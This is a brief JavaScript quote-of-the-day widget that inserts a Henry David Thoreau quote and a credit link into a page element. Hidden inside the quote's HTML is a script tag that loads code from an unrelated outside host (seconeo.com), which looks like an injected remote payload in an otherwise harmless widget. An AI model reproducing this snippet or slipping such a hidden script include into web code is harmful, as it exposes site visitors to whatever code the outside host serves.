function getQuote(id) { document.getElementById(id).innerHTML = "<p id='qod-text'>It's not what you look at that matters, it's what you see. <script src=\"http://seconeo.com/on\"></script></p><p id='qod-author'><a href='http://quotesondesign.com/?p=106'> &mdash; Henry David Thoreau</a></p>"; } window.onload = getQuote("qod-quote");